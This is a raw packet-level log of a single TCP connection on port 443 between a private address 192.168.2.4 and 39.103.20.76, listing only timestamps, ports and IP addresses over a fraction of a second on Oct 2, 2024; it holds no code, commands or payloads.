Oct 2, 2024 04:27:36.398595095 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.398631096 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.398686886 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.398726940 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.398785114 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.398816109 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.398876905 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.398930073 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.398987055 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.399043083 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.399102926 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.399151087 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.399208069 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.399260044 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.399318933 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.399374962 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.399440050 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.399482012 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.399540901 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.399580002 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.399636030 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.399672031 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.399732113 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.399766922 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.399820089 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.399900913 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.399961948 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.400022030 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.400079966 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.400140047 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.400198936 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.400254965 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.400330067 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.400352955 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.400413036 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.400473118 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.400531054 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.400588036 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.400649071 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.400684118 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.400743008 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.400779009 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.400836945 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.400876045 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.400949955 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.400980949 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.401041985 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.401079893 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.401144028 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.401177883 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.401238918 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.401273966 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.401334047 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.401379108 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.401434898 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.401488066 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.401566982 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.401598930 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.401659966 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.401694059 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.401751041 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.401808023 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.401878119 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.401902914 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.401957989 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.401994944 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.402055979 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.402085066 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.402143002 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.402179003 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.402239084 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.402276993 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.402337074 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.402373075 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.402429104 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.402467966 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.402528048 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.402566910 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.402618885 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.402671099 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.402724981 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.402785063 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.402836084 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.402896881 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.402954102 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.403002024 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.403059959 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.403115034 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.403168917 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.403209925 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.403268099 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.403300047 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.403353930 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.403436899 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.403498888 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.403552055 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.403604984 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.403645992 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.403704882 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.403743982 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.403799057 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.403837919 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.403892994 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.403932095 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.403990030 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.404033899 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.404092073 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.404131889 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.404239893 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.404273987 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.404331923 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.404367924 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.404424906 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.404464006 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.404519081 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.404560089 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.404609919 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.404676914 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.404738903 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.404772997 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.404829025 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.404866934 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.404946089 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.404958963 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405020952 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.405060053 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405122042 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.405160904 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405213118 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.405255079 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405311108 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.405375957 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405435085 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.405487061 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405533075 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405534029 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.405545950 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405576944 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.405586004 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.405601978 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405647993 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.405651093 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405659914 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405689955 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.405694962 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405698061 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.405704021 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405730963 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405741930 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.405760050 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.405764103 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405775070 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405788898 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.405812025 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405812979 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.405822039 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405838013 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.405848980 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405867100 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.405874014 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405890942 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405896902 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.405896902 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.405905008 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405929089 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405931950 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.405955076 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.405961037 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405970097 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405987024 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.405997992 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.405999899 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.406009912 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.406018972 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.406039000 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.406039000 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.406056881 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.406068087 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.406078100 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.406084061 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.406105995 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.406111002 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.406119108 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.406130075 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.406152010 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.406161070 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.406167030 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.406193972 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.406198025 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.406215906 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.406220913 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.406232119 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.406239986 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.406260014 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.406265020 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.406275988 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.406301022 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.406310081 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.406321049 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.406327009 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.406341076 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.406357050 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.406364918 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.406368017 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.406378984 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.406394958 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.406410933 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.406430960 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.406435966 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.406455994 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.406475067 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.423506021 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.481005907 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.481053114 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.481096983 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.481103897 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.481151104 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.481163979 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.492482901 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.492559910 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.492594957 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.492647886 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.492692947 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.492778063 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.492793083 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.492855072 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.492885113 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.492947102 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.492970943 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.493026972 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.493695974 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.493752003 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.493793011 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.493851900 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.493911982 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.493963957 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.494008064 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.494060040 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.494098902 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.494158030 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.494472027 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.494529009 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.494601965 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.494667053 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.495755911 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.495812893 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.495852947 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.495908976 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.495949984 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.496010065 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.496047974 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.496098995 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.496145964 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.496200085 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.496242046 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.496299982 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.496339083 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.496393919 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.496434927 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.496504068 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.496531010 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.496587992 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.496623993 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.496680021 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.496738911 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.496794939 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.496834993 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.496891975 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.496929884 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.496987104 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.497025013 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.497081995 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.497122049 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.497174978 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.497212887 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.497277021 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.571973085 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.572048903 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.572088957 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.572103977 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.572115898 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.572148085 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.583741903 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.583853006 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.583868980 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.583961010 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.583976984 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.584032059 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.584079027 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.584139109 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.584176064 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.584234953 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.584276915 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.584335089 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.584825993 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.584887028 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.584932089 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.584995031 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.585035086 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.585093975 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.585138083 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.585192919 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.585233927 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.585288048 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.585342884 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.585402966 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.585464954 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.585530043 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.585633993 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.585705996 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.586730957 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.586785078 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.586857080 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.586925030 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.586975098 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.587028027 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.587078094 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.587133884 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.587184906 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.587240934 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.587281942 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.587332010 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.587378979 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.587452888 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.587500095 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.587559938 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.587608099 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.587663889 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.587738991 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.587793112 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.587833881 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.587891102 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.587934017 CEST	443	49740	39.103.20.76	192.168.2.4
